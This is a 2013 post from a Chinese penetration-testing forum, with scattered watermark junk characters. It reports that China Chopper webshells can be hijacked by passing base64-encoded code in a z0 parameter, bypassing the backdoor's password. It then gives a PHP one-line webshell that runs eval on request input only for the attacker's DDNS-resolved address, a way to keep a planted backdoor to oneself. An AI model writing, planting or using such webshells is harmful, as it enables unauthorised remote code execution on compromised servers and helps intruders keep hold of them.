中国网络渗透测试联盟

标题: 中国菜刀 maicaidao 网站管理软件 0day [打印本页]
作者: admin    时间: 2013-7-26 12:45
标题: 中国菜刀 maicaidao 网站管理软件 0day
今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞5 {- N# I3 p  U- A
% y# p: h( f1 `% n/ Z
就算你设置了密码,使用了eval($_REQUEST['moyo']);( i9 o! ~( d: B) Z1 G
# q/ o3 q6 L  I8 C
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门- ?: x5 i  E+ {5 n$ `
# C7 r# L8 W# }8 f
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));4 F) t; r: M, D7 W# u

/ o' X( I" N7 O直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
+ m# j; J) c6 f# ?) T7 }9 g; i5 w( M9 ?1 d0 M$ C  Y3 G
不知道是设计缺陷还是故意留的后门
( y2 n+ v8 ~% a* E1 S' G
0 Y4 N" Z" I* H如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
9 |: }* B3 {0 i  v  H! V: Z% G6 w4 S  w: \& y
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org" p  z/ M9 G8 c1 I# ]  f( F

! w4 [2 i6 q" s3 }% j5 y然后一句话后门这样写& T6 ?6 _+ N% \% ^1 Z
; p# X4 v. q; G7 C  }
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
2 a) o; m1 f5 V  G  Q. l9 q这样就可以让一句话后门只允许自己的电脑连接了
/ r" i( k* N9 x3 s- M- v* L
, |7 ?- s6 b& x. X



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2